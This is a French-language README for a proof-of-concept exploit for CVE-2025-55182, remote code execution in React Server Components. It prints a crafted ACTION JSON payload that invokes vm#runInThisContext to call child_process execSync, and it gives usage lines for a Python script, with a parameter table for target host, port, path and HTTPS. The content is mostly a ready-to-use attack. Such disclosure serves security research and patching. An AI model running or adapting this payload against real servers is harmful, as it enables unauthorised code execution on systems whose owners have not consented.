
Exploit de preuve de concept pour CVE-2025-55182, démontrant l'exécution de code à distance dans les composants serveur React via des charges utiles ACTION malveillantes et une injection vm.runInThisContext.
Ce projet est une Preuve de Concept (PoC) pour CVE-2025-55182 - Remote Code Execution (RCE) dans React Server Components (RSC), démontrant que, dans des conditions spécifiques, il est possible de déclencher une exécution de code à distance via vm.runInThisContext et une charge utile ACTION malveillante.
La charge utile ACTION des React Server Components, sous certaines conditions :
Un attaquant peut construire la charge utile :
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| Paramètre | Obligatoire | Valeur par défaut | Description |
|---|---|---|---|
--host | Oui | Aucune | IP ou nom de domaine du serveur cible. Ex. : 127.0.0.1, 192.168.1.10, example.com |
--port | Non | 80 | Port du service HTTP cible, ex. : 3003 |
--path | Oui | Aucune | Chemin de la route cible déclenchant la vulnérabilité, ex. : /feedback, /action |
--https | Non | False | Utiliser HTTPS pour envoyer la charge utile (HTTP par défaut) |
python a.py --host <IP_cible> --port --path <chemin_URL_cible>
python a.py --host 127.0.0.1 --port 3003 --path /feedback